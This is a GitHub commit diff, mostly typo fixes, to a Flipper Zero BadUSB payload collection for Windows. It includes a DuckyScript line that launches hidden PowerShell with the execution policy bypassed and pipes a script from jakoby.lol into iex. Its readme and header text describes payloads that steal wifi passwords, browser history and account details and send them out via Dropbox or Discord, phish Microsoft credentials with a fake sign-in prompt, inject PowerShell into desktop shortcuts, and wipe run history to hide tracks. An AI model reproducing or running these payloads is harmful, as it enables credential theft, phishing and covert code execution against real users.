Merge pull request #39 from Kavitate/main

Various Updates
This commit is contained in:
I-Am-Jakoby 2022-12-25 10:57:58 -06:00 committed by GitHub
commit 5d0fd64f70
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
39 changed files with 99 additions and 99 deletions

View file

@ -19,13 +19,13 @@
<# <#
.SYNOPSIS .SYNOPSIS
This is an advanced recon of a target PC and exfiltration of that data This is an advanced recon of a target PC and exfiltration of that data.
.DESCRIPTION .DESCRIPTION
This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running.
All of the gather information is formatted neatly and output to a file All of the gather information is formatted neatly and output to a file.
That file is then exfiltrated to cloud storage via DropBox That file is then exfiltrated to cloud storage via Dropbox.
.Link .Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads
https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads
https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads
#> #>

View file

@ -2,7 +2,7 @@ REM Title: ADV-Recon
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details. REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details.
REM Target: Windows 10, 11 REM Target: Windows 10, 11
@ -10,4 +10,3 @@ GUI r
DELAY 500 DELAY 500
STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
ENTER ENTER

View file

@ -15,7 +15,7 @@
# ADV-Recon # ADV-Recon
A script used to do an advanced level of Recon on the targets computer. A script used to do an advanced level of recon on the target's computer.
Version 2 no longer requires you to host your own version of the script. Version 2 no longer requires you to host your own version of the script.
@ -25,11 +25,11 @@ Modifying the execution script is the only necessary interaction.
This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes: This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes:
* Hosts Powershell Version (to know what commands can be run) * Hosts PowerShell Version (to know what commands can be run)
* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected) * Name associated with their Microsoft account (Or ENV UserName variable if one is not detected)
* Whether they are in the Admin group or not * Whether they are in the Admin group or not
* The email associated with their Microsoft Account (for phishing possibilities) * The email associated with their Microsoft account (for phishing possibilities)
* Other User accounts on their system (for possible privledge escalation) * Other User accounts on their system (for possible privilege escalation)
* Details on their login settings (Ex: Min/Max password age and length) * Details on their login settings (Ex: Min/Max password age and length)
* How many days since they have changed their password (Max password age - Days since = Opportunity) * How many days since they have changed their password (Max password age - Days since = Opportunity)
* Their GeoLocation (know their approximate where abouts) * Their GeoLocation (know their approximate where abouts)
@ -39,7 +39,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
* Network Interfaces (What are they connecting in and out with) * Network Interfaces (What are they connecting in and out with)
* System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) * System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS)
* Local Users (Accounts on system with Username, name associated with microsoft account and SID) * Local Users (Accounts on system with Username, name associated with microsoft account and SID)
* Information on their HardDrives (Indicator of Recon Scope) * Information on their hard drives (Indicator of Recon Scope)
* COM and Serial Devices (Is there a device connected you can manipulate?) * COM and Serial Devices (Is there a device connected you can manipulate?)
* Active TCP Connections (Poor mans Port Scanning) * Active TCP Connections (Poor mans Port Scanning)
* Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) * Processes, Services, Software, and Drivers (What is running on the computer we can exploit?)
@ -50,7 +50,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
### Dependencies ### Dependencies
* DropBox or Discord * Dropbox or Discord
* Windows 10,11 * Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>

View file

@ -2,8 +2,8 @@ REM Title: ADV-RickRoll
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume.
REM Upon deployment payload will pause until a mouse movement is detected and run once one is. REM Upon deployment, payload will pause until a mouse movement is detected and run once one is.
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -23,7 +23,7 @@
# ADV-RickRoll # ADV-RickRoll
A script used to do an advanced rick roll on your target A script used to do an advanced rick roll on your target.
## Description ## Description

View file

@ -15,17 +15,17 @@
# Acid Burn # Acid Burn
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description ## Description
This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account.
The SSID and WiFi password of any current or previously connected to networks. The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed thier password and how many days ago. It determines the last day they changed their password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected Once the information is gathered, the script will pause until a mouse movement is detected.
Then the script uses Sapi speak to roast their set up and lack of security Then, the script uses Sapi speak to roast their set up and lack of security.
If wifi networks and passwords are detected wallpaper will be changed to image displaying that information If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information.
Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image.
## Getting Started ## Getting Started

View file

@ -22,9 +22,9 @@
## Description ## Description
This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
They are then exfiled using either discord or dropbox They are then exfiled using either Discord or Dropbox.
## The Function ## The Function

View file

@ -2,7 +2,7 @@ REM Title: Browser-Data
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, and Firefox REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX.
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -2,7 +2,9 @@ REM Title: Credz-Plz
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
REM See README.md file for more details.
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -25,7 +25,7 @@
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt. This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your dropbox for collection Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection
.Link .Link
https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads

View file

@ -15,18 +15,18 @@
# Credz-Plz # Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook.
## Description ## Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account".
This will be followed by a fake authentication ui prompt. This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up.
Once the target enters their credentials their information will be uploaded to your dropbox for collection. Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection.
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg) ![alt text](https://i.imgur.com/mudQcIh.png)
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg) ![alt text](https://i.imgur.com/3JqE7a8.png)
## Getting Started ## Getting Started

Binary file not shown.

After

Width:  |  Height:  |  Size: 140 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 73 KiB

After

Width:  |  Height:  |  Size: 184 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 39 KiB

View file

@ -23,7 +23,7 @@
# JumpScare 2.0 # JumpScare 2.0
A script used to jumpscare your target A script used to jumpscare your target.
## Description ## Description
@ -31,7 +31,7 @@ This script will jumpscare your target.
A jumpscare video will be downloaded to their temp directory. A jumpscare video will be downloaded to their temp directory.
When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen. When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen.
## Getting Started ## Getting Started

View file

@ -15,7 +15,7 @@
# JumpScare # JumpScare
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description ## Description

View file

@ -23,7 +23,7 @@
# Must Sub # Must Sub
A script used to get your target to subscribe to 15 of my favorite hacker youtube channels A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels.
## Description ## Description

View file

@ -15,20 +15,20 @@
# PS-Draw # PS-Draw
A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims.
## Description ## Description
These two programs use two different method to draw out images in the Powershell Window. These two programs use two different methods to draw out images in the PowerShell window.
PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors, PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors,
then draw your image out in the powershell window. This process is not exact and needs testing of multiple images to find one that works well. then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well.
PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself. PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself.
These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose. These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose.
After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the
UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the powershell window. UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window.
## Getting Started ## Getting Started

View file

@ -15,13 +15,13 @@
# PineApple # PineApple
A script used to connect a targets PC to your wifi PineApple A script used to connect a targets PC to your Wifi PineApple.
## Description ## Description
This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. This program will generate an XML file that will be used to create a network profile for your Wifi PineApple.
The XML file will be manually entered into a Powershell window. The XML file will be manually entered into a PowerShell window.
The Powershell window and run box will be erased for a clean exit. The PowerShell window and run box will be erased for a clean exit.
## Getting Started ## Getting Started

View file

@ -15,14 +15,14 @@
# Play-WAV # Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected A script used to download a WAV file and play it after a mouse movement is detected.
## Description ## Description
This program starts off by using an Invoke-WebRequest to download a WAV file. This program starts off by using an Invoke-WebRequest to download a WAV file.
The system volume is then turned up to the max level. The system volume is then turned up to the max level.
Then the script will be paused until a mouse movement is detected. Then the script will be paused until a mouse movement is detected.
After one is the WAV file will be played. After a mouse movement is detected, the WAV file will be played.
## Getting Started ## Getting Started
@ -34,7 +34,7 @@ After one is the WAV file will be played.
### Executing program ### Executing program
* Place the WAV Url in the $wav variable * Place the WAV URL in the $wav variable
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file * Invoke-WebRequest will be entered in the Run Box to download your WAV file

View file

@ -15,11 +15,11 @@
# Rage-PopUps # Rage-PopUps
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description ## Description
This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to. This program will open a series of pop-up boxes with insults in a loop that repeats as many times as you set it to.
There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided. There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided.
## Getting Started ## Getting Started

View file

@ -19,10 +19,10 @@
<# <#
.SYNOPSIS .SYNOPSIS
This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers.
.DESCRIPTION .DESCRIPTION
This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up
for each one of them. for each one of them.
#> #>

View file

@ -30,23 +30,23 @@
<br>YouTube Tutorial <br>YouTube Tutorial
</p> </p>
A script used to embed malware in the shortcut on your targets desktop A script used to embed malware in the shortcut on your target's desktop.
## Description ## Description
This payload will run a powershell script in the background of any shortcut used on the targets desktop. This payload will run a PowerShell script in the background of any shortcut used on the target's desktop.
This is done by taking advantage of the `Target` field where powershell commands can be stored or run. This is done by taking advantage of the `Target` field where PowerShell commands can be stored or run.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run. This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the `$code` variable and it will still run.
So if your command exceeds that consider using an IWR function to download and execute a longer script. So if your command exceeds that, consider using an IWR function to download and execute a longer script.
I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13) I have an Invoke WebRequest tutorial for that [HERE](https://www.youtube.com/watch?v=bPkBzyEnr-w&list=PL3NRVyAumvmppdfMFMUzMug9Cn_MtF6ub&index=13)
<img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300"> <img src="https://github.com/I-Am-Jakoby/hak5-submissions/raw/main/Assets/Shortcut-Jacker/properties.jpg" width="300">
Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the powershell code you want executed is stored. Inside the .ps1 file you will find a line at the beginning with a ```$code``` variable. This is where the PowerShell code you want executed is stored.
--------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------------------------------------------------------------------------------------------------------------------------
@ -60,7 +60,7 @@ Using the `Get-Shortcut` function we will get the following information we can t
## Getting Started ## Getting Started
Once the script is executed all of the shortcuts on your target's desktop will be infected with the powershell code you have stored in the `$code` variable in the .ps1 file Once the script is executed, all of the shortcuts on your target's desktop will be infected with the PowerShell code you have stored in the `$code` variable in the .ps1 file
### Dependencies ### Dependencies

View file

@ -19,12 +19,12 @@
<# <#
.SYNOPSIS .SYNOPSIS
This is payload used to inject powershell code into shortcuts This is payload used to inject PowerShell code into shortcuts.
.DESCRIPTION .DESCRIPTION
This payload will gather information on the shortcuts on your targets desktop This payload will gather information on the shortcuts on your targets desktop.
That data will then be manipulated to embed a powershell script That data will then be manipulated to embed a PowerShell script.
This script will be ran in the background when the short cut is This script will be ran in the background when the short cut is.
#> #>
@ -32,7 +32,7 @@
<# <#
.NOTES .NOTES
The powershell code stored in this variable is what will run in the background The PowerShell code stored in this variable is what will run in the background.
This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code This field can store a max of 259 VISIBLE characters in that bar however after some testing I found you can store 924 characters int the $code
variable and it will still run. variable and it will still run.
#> #>

View file

@ -15,11 +15,11 @@
# Subscribe # Subscribe
A script I put together to make your target subscribe to your youtube channel A script I put together to make your target subscribe to your YouTube channel.
## Description ## Description
This script is set to open your youtube account in their browser where they will be prompted to subscribe to you. This script is set to open your YouTube account in their browser where they will be prompted to subscribe to you.
SPOILER: They do. SPOILER: They do.
## Getting Started ## Getting Started
@ -27,7 +27,7 @@ SPOILER: They do.
### Dependencies ### Dependencies
* Windows 10,11 * Windows 10,11
* Your target will have to be signed into their youtube account * Your target will have to be signed into their YouTube account
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>

View file

@ -19,11 +19,11 @@
<# <#
.DESCRIPTION .DESCRIPTION
This program is designed to get your target to subscribe to your youtube channel This program is designed to get your target to subscribe to your YouTube channel.
#> #>
############################################################################################################################################# #############################################################################################################################################
# Enter your youtube channel URL here, ONLY if you are rehosting this script yourself # Enter your YouTube channel URL here, ONLY if you are rehosting this script yourself
# $channel = "https://www.youtube.com/iamjakoby" # $channel = "https://www.youtube.com/iamjakoby"

View file

@ -2,7 +2,7 @@ REM Title: Subscribe
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload is meant to make your target subscribe to your youtube channel REM Description: This payload is meant to make your target subscribe to your YouTube channel
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -15,13 +15,13 @@
# Wallpaper-URL # Wallpaper-URL
This payload will download an image from any URL and set it as the targets wallpaper This payload will download an image from any URL and set it as the target's wallpaper.
## Description ## Description
Use this program to troll your friends. Find any image online and grab the url and insert it into the PS1 script. Use this program to troll your friends. Find any image online and grab the URL and insert it into the PS1 script.
Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes. Run this payload and step away. Once a mouse movement is detected, their wallpaper will change right in front of their eyes.
Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the powershell and run box history will be wiped Lastly, to clean up your tracks behind you, the tmp folder will be emptied and the PowerShell and run box history will be wiped.
## Getting Started ## Getting Started

View file

@ -15,7 +15,7 @@
# Wallpaper-Troll # Wallpaper-Troll
A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes.
## Description ## Description

View file

@ -21,10 +21,10 @@
.DESCRIPTION .DESCRIPTION
This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude, This program gathers details from target PC to include name associated with the microsoft account, their latitude and longitude,
Public IP, and and the SSID and WiFi password of any current or previously connected to networks. Public IP, the SSID, and WiFi password of any current or previously connected to networks.
It will take the gathered information and generate a .jpg with that information on show It will take the gathered information and generate a .jpg with that information on show.
Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned Finally that .jpg will be applied as their Desktop Wallpaper so they know they were owned.
Additionally a secret message will be left in the binary of the wallpaper image generated and left on their desktop Additionally, a secret message will be left in the binary of the wallpaper image generated and left on their desktop.
#> #>
############################################################################################################################################# #############################################################################################################################################

View file

@ -2,11 +2,11 @@ REM Title: Wallpaper-Troll
REM REM
REM Author: I am Jakoby REM Author: I am Jakoby
REM REM
REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details REM Description: This payload is meant to taunt your target with a revealing wallpaper. See README.md for more details.
REM REM
REM Target: Windows 10, 11 REM Target: Windows 10, 11
REM REM
REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload REM Remeber to replace the link with your link for the intended file to download if you are using a custom variant of this payload.
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly
REM REM
REM -------------------------------------------------------------------------------------- REM --------------------------------------------------------------------------------------

View file

@ -2,7 +2,7 @@ REM Title: We-Found-You
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload is meant to open a map in your targets web browser with their current location REM Description: This payload is meant to open a map in your target's web browser with their current location.
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -19,17 +19,17 @@
<# <#
.NOTES .NOTES
The targets Location Services must be turned on or this payload will not work The target's Location Services must be turned on or this payload will not work.
.SYNOPSIS .SYNOPSIS
This script will get the users location and open a map of where they are in their browser and use windows speech to declare you know where they are This script will get the user's location and open a map of where they are in their browser and use Windows speech to declare you know where they are.
.DESCRIPTION .DESCRIPTION
This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. This program gathers details from target PC to include Operating System, RAM Capacity, Public IP, and Email associated with their Microsoft account.
The SSID and WiFi password of any current or previously connected to networks. The SSID and WiFi password of any current or previously connected to networks.
It determines the last day they changed their password and how many days ago. It determines the last day they changed their password and how many days ago.
Once the information is gathered the script will pause until a mouse movement is detected Once the information is gathered, the script will pause until a mouse movement is detected.
Then the script uses Sapi speak to roast their set up and lack of security Then the script uses Sapi speak to roast their set up and lack of security.
#> #>
#----------------------------------------------------------------------------------------------------------------------------------------------------------- #-----------------------------------------------------------------------------------------------------------------------------------------------------------
@ -37,7 +37,7 @@
<# <#
.NOTES .NOTES
This is to get the Name associate with the targets microsoft account, if not detected UserName will be used This is to get the name associated with the targets Microsoft account, if not detected UserName will be used.
#> #>
function Get-fullName { function Get-fullName {

View file

@ -17,7 +17,7 @@
## Description ## Description
This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
## Getting Started ## Getting Started
@ -30,9 +30,9 @@ This payload grabs your targets wifi passwords and uploads them to either Dropbo
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory * Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
`$dc` is the variable that stores your discord webhook `$dc` is the variable that stores your Discord webhook
`$db` is the variable that stores your dropbox token `$db` is the variable that stores your Dropbox token
Fill in either or both of these to methods to exfil your collected data Fill in either or both of these to methods to exfil your collected data

View file

@ -7,7 +7,7 @@ $wifiProfiles > $env:TEMP/--wifi-pass.txt
############################################################################################################################################################ ############################################################################################################################################################
# Upload output file to dropbox # Upload output file to Dropbox
function DropBox-Upload { function DropBox-Upload {

View file

@ -2,7 +2,7 @@ REM Title: Wifi Grabber
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: This payload grabs your targets wifi passwords and uploads them to either Dropbox, Discord, or both REM Description: This payload grabs your target's wifi passwords and uploads them to either Dropbox, Discord, or both.
REM Target: Windows 10, 11 REM Target: Windows 10, 11

View file

@ -23,14 +23,14 @@
# YouTube Tripwire # YouTube Tripwire
Plays any YouTube video after a mouse movement is detected Plays any YouTube video after a mouse movement is detected.
## Description ## Description
This script is a one liner that can fit in the runbox by itself. This script is a one liner that can fit in the runbox by itself.
Just replace the URL for the Youtube video and run it. Just replace the URL for the YouTube video and run it.
You can now unplug your device and walk away. You can now unplug your device and walk away.
When your target returns and moves their mouse the video will start playing full screen. When your target returns and moves their mouse, the video will start playing full screen.
## Getting Started ## Getting Started

View file

@ -1,7 +1,6 @@
REM Title: YouTube-TripWire REM Title: YouTube-TripWire
REM Author: I am Jakoby REM Author: I am Jakoby
REM Description: Plays any YouTube video after a mouse movement is detected REM Description: Plays any YouTube video after a mouse movement is detected. (Replace URL with your own)
REM Replace URL with your own
REM Target: Windows 10, 11 REM Target: Windows 10, 11
GUI r GUI r
DELAY 500 DELAY 500

View file

@ -2,7 +2,7 @@
# 🐬 Flipper-Zero-BadUSB 🐬 # 🐬 Flipper-Zero-BadUSB 🐬
If you would like to support the work that I do please consider becoming a subscriber in our Discord If you would like to support the work that I do, please consider becoming a subscriber in our Discord.
[SUBSCRIBE](https://jakoby.lol/tah) [SUBSCRIBE](https://jakoby.lol/tah)
@ -53,9 +53,9 @@ Subscribing to my YouTube would also be really appreciated.
This repository has been optimized to facilitate plug and play functionality. This repository has been optimized to facilitate plug and play functionality.
I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs I purchased the domain `jakoby.lol` for the sole purpose of creating my own short URLs.
I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners I did this with the intention of making room for discord webhooks and dropbox tokens to fit in my one liners.
This in turn makes it so the user no longer has to host their own version of the script. This in turn makes it so the user no longer has to host their own version of the script.